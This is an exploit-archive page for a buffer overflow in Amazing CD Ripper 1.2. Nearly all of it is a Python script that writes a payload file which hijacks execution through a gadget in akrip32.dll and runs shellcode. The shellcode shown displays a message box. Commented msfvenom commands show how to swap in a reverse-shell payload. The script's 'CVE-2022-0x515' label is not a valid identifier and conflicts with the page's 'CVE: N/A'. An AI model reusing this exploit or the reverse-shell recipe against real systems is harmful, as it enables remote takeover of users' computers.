Amazing CD Ripper 1.2 Buffer Overflow

2022.03.22
Credit: Hejap Zairy
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit Title: Amazing CD Ripper v1.2 - Buffer Overflow # Exploit Author: Hejap Zairy # Date: 03.08.2022 # Software Link: http://www.shelltoys.com/cd_ripper.exe # Software Link: https://web.archive.org/web/20160313071152/http://www.shelltoys.com/cd_ripper.exe # Tested Version: v1.2.1 # Tested on: Windows 10 64bit # 1.- Run python code : 0day-Hejap_Zairy.py # 2.- Open 0day_Hejap.txt and copy All content to Clipboard # 3.- Open Amazing CD Ripper and press Enter Code # 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code' # 5.- Click 'OK' # Author Code By Hejap Zairy #CVE-2022-0x515 #!/usr/bin/env python from pwn import * buffer = "\x41" * 1016 # 0x100017a1 : push esp # ret | null {PAGE_EXECUTE_READ} [akrip32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0rc2 (C:\Program Files (x86)\Shelltoys\Amazing CD Ripper\akrip32.dll) push_esp = p32(0x100017a1) #push esp ret ret from akrip32.dll nops = "\x90" * 15 #515 tshhh theardlooo love Malware #msfvenom --arch x64 windows/x64/shell_reverse_tcp lhost=ip lport=443 -f python -e x64/shikata_ga_nai -b "\x00\x0a\x0d\x20\xff" #msfvenom --arch x64 -p windows/x64/messagebox TEXT="0day Hejap Zairy" -f python -e x64/shikata_ga_nai EXITFUNC=thread -b "\x00\x0a\x0d\x20\xff" buf = b"" buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00" buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b" buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e" buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9" buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52" buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00" buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b" buf += b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48" buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9" buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0" buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6" buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b" buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b" buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41" buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0" buf += b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff" buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a" buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31" buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a" buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28" buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79" buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00" buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00" padding ="C" * (len(buffer) - len(push_esp) - len(nops)) payload = buffer + push_esp + nops + buf + padding try: with open("0day_Hejap.txt","wb") as f: print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("[-]File cannot be created") # Proof and Exploit: https://i.imgur.com/3r5sKNo.png


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top